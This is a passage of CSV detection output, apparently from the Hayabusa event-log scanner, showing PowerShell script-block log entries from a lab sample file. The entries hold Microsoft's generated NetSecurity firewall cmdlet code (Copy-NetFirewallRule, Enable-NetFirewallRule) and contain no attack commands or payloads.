'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] 
${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 